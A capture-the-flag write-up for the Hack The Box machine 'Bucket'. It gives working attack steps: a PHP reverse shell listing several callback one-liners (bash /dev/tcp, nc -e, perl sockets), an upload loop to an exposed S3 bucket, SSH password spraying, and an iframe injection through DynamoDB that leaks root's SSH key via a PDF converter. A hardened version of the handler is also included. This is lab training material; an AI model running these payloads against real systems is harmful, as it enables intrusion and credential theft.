Bucket Write Up – Hack The Box

Edit: because of a move to a new server, the image files for this article are missing.

Enumeration:

Let's start by running nmap. The picture below shows the scan and the command used to obtain it.

[Image: nmap scan of Bucket 10.10.10.212]

nmap -T4 -A -Pn 10.10.10.212

From the scan we see that there is a redirect to http://bucket.htb/, so I added it to /etc/hosts and opened the domain. I usually check the page source to see if there is something interesting, and there it was.

http://s3.bucket.htb/

I added this new domain to the hosts file as well and checked both hosts. The next step is to scan for other directories. I used gobuster.

[Image: gobuster for bucket – 10.10.10.212]

The command is below.

sudo gobuster dir -w '/usr/share/wordlists/dirb/big.txt' -t 50 -e -u http://s3.bucket.htb

From the image above you can see that three pages are found. If you try to open the “shell” page as listed you will not be successful: you need to add a slash at the end, and then you will be led to a page with a shell.

http://s3.bucket.htb/shell/

This page confirms that the machine is running AWS services, and we can see that it uses DynamoDB. My next step was to start reading about AWS and DynamoDB. I will give some links here if you want to learn what the commands do. I spent some time reading because I had never worked with this before.

Links:

https://aws.amazon.com/cli/
https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-quickstart.html#cli-configure-quickstart-creds
https://docs.aws.amazon.com/IAM/latest/UserGuide/getting-started_create-admin-group.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-services-dynamodb.html

First you need to install the awscli. To do that use the command below.


apt update && apt install awscli

The next step is to configure the aws cli. The information is in one of the links. In this case we don't need a real key; dummy values are enough.

After that is done I enumerated the database to see what is in there. I will post the command but not its result, so you can see it for yourself and get the correct information.

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb

The information we get is not used immediately, but still save it in a file, because it is crucial later. The next step is to enumerate the buckets. Use the commands below, and again I encourage you to read all the documentation in the links, and more, to understand how the service works.

aws --endpoint-url http://s3.bucket.htb/ s3 ls
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver
aws --endpoint-url http://s3.bucket.htb/ s3 ls s3://adserver/images/

Foothold:

After some trial and error I found a PHP reverse shell code that works.


<?php
echo 'running shell';
$ip='10.10.14.14';   # Change this to your HTB IP
$port='1337';
$reverse_shells = array(
    '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
    '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
    '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
    'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
    "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
    'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
    'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
   try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
   try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
   try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>

Save this in a reverse.php file. The following commands will upload the shell:


aws --endpoint-url http://s3.bucket.htb/ s3 cp reverse.php s3://adserver/


Because the machine is cleaned every 30 seconds, a bash script will be really helpful. Save the code below to reverse.sh.


#!/bin/bash

aws --endpoint-url http://s3.bucket.htb/ s3 cp reverse.php s3://adserver/

echo ""
echo "[-] Executing reverse shell...Please run nc listener"
echo "[-] Kill me with Ctrl+C on successful connection"

# Keep requesting the uploaded file until the listener catches the connection.
# Redirect both stdout and stderr portably: '&>' is bash-only and under /bin/sh
# would background curl instead.
while true
do
	curl http://bucket.htb/reverse.php > /dev/null 2>&1
done

So open two terminal windows now. In one of them run the .sh, and in the other listen with netcat. You should be able to do that by yourself; if you have a question about it please leave a comment and I will try to answer ASAP.

USER:

While I had the shell I browsed a little and found the user name in /home/. That is really good because, if you remember, we have some passwords from before. So save the username “roy” in one text file, clean up the passwords and put them in another file called passwords.txt. Now you have two options: use metasploit with the module ‘auxiliary/scanner/ssh/ssh_login’, or try each password manually with that username over ssh. There are not so many, so the manual method will work as well. I personally used metasploit.

Once you ssh in you will find the user flag in the usual place.

If you get stuck join our Discord. Even if you are not stuck join and chat with like minded people.

ROOT:

Getting the root flag was harder than I expected. There was a lot of reading and enumeration. During the enumeration we can see an interesting function in an index.php file.

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

So what now? Looking at the code above, we can see that it waits for a POST request, creates a new DynamoDB client, scans a table called “alerts” for items whose title is “Ransomware”, writes each item's data to an HTML file, and then renders that HTML into a PDF. Anything we can put in that table therefore ends up being parsed by the PDF converter as HTML.
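For comparison, this is a hardened version of the same handler, added here as an example and not code from the box. The `token` POST parameter and the `ALERTS_TOKEN` environment variable are assumptions for illustration; the key changes are that the endpoint requires a shared secret, every value read from DynamoDB is HTML-escaped so an embedded iframe is rendered as literal text instead of being fetched by the converter, the scratch file name is unpredictable and used consistently, and the path handed to `passthru` is shell-quoted.

```php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;

// Hypothetical shared secret read from the environment (assumption, not from the box).
$expected_token = getenv('ALERTS_TOKEN') ?: '';

// Build one HTML document from the alert rows, escaping every value so markup stored
// in DynamoDB (such as <iframe src="file:///..."> ) is rendered as literal text and
// never fetched by the PDF converter.
function build_alert_html(iterable $items): string {
    $rows = '';
    foreach ($items as $item) {
        $title = htmlspecialchars($item['title']['S'] ?? '', ENT_QUOTES, 'UTF-8');
        $data  = htmlspecialchars($item['data']['S'] ?? '', ENT_QUOTES, 'UTF-8');
        $rows .= "<tr><td>{$title}</td><td>{$data}</td></tr>\n";
    }
    return "<html><body><table>\n{$rows}</table></body></html>";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'get_alerts') {
    // Reject unauthenticated callers; the original handler fired for anyone who could
    // reach port 8000 with a single curl.
    $given = $_POST['token'] ?? '';
    if ($expected_token === '' || !hash_equals($expected_token, $given)) {
        http_response_code(403);
        exit('forbidden');
    }

    $client = new DynamoDbClient([
        'profile' => 'default', 'region' => 'us-east-1',
        'version' => 'latest', 'endpoint' => 'http://localhost:4566',
    ]);
    $iterator = $client->getIterator('Scan', [
        'TableName' => 'alerts',
        'FilterExpression' => 'title = :title',
        'ExpressionAttributeValues' => [':title' => ['S' => 'Ransomware']],
    ]);

    // One unpredictable file per request; the original reused $name from the last
    // loop iteration and picked it with rand().
    $path = __DIR__ . '/files/' . bin2hex(random_bytes(16)) . '.html';
    file_put_contents($path, build_alert_html($iterator));

    // Quote every dynamic value handed to the shell, and keep the output path fixed.
    $cmd = 'java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd '
         . escapeshellarg('file://' . $path) . ' 800 A4 -out files/result.pdf';
    passthru($cmd);
    unlink($path);
}
```

Running the converter as an unprivileged account instead of root would additionally limit any file read to files that account can open.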

For the next steps I will provide the commands, but I still recommend checking out the DynamoDB documentation linked above.

Create the needed table. Keep in mind that the spacing is necessary; it took me some time to figure that part out.

aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
        AttributeName=data,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
        AttributeName=data,KeyType=RANGE \
    --provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 \
    --endpoint-url http://s3.bucket.htb

Payload:

aws dynamodb put-item \
    --table-name alerts \
    --item '{
        "title": {"S": "Ransomware"},
        "data": {"S": "<html><head></head><body><iframe src=\"/root/.ssh/id_rsa\"></iframe></body></html>"}
      }' \
    --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb

Run this in the terminal where you are sshed in as “roy”:

curl --data "action=get_alerts" http://localhost:8000/

To download the generated pdf which will contain the ssh key:

scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf ./

Open the PDF and copy the key into a text file. Change the permissions of the file (ssh refuses keys that are readable by others) and ssh into the machine as root. Use the commands below.

sudo chmod 600 keyfilename.txt
ssh root@bucket.htb -i keyfilename.txt

After that you can find the root flag. So that was the write-up. Even if you have followed it letter by letter, read the documentation provided in the links. AWS services are widely used and this box felt pretty close to real life, so put in the time.